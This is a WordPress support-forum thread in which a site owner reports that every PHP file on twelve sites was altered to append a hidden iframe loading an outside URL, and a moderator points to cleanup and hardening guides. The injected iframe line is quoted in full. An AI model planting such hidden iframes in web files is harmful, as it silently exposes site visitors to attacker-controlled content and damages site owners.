Another site attack | ww.wp.xz.cn

deflorence
(@deflorence)

15 years, 5 months ago

The 12 WordPress sites I run on shared hosting server with Gradwell (located in the UK) were subject to a particular simple but vicious attack: ALL the php WP files, including the plugins files, were modified with the adding of iframe src=”http://gaccess.dynsite.net/blog/wp-content/0wn3d/” style=”display:none” at the end of each file, rendering the affected sites invisible, including the backends!

The modification dates were all 14 December 2010, around 22h25 GMT.

My host provider was very helpful and helped me clean the files.

Have you seen or heard of such an attack before?

Viewing 1 replies (of 1 total)

Moderator t-p
(@t-p)

15 years, 5 months ago

i don’t know much about this particular attack. But to minimize probability of future attack, you may want to have read of this:

see:

http://codex.ww.wp.xz.cn/FAQ_My_site_was_hacked
http://ww.wp.xz.cn/support/topic/268083#post-1065779
http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/
http://ottopress.com/2009/hacked-wordpress-backdoors/

Then implement tips of this guide: http://codex.ww.wp.xz.cn/Hardening_WordPress

Viewing 1 replies (of 1 total)

The topic ‘Another site attack’ is closed to new replies.

In: Fixing WordPress
1 reply
2 participants
Last reply from: t-p
Last activity: 15 years, 5 months ago
Status: not resolved

Topics

Topics with no replies

Non-support topics

Resolved topics

Unresolved topics

All topics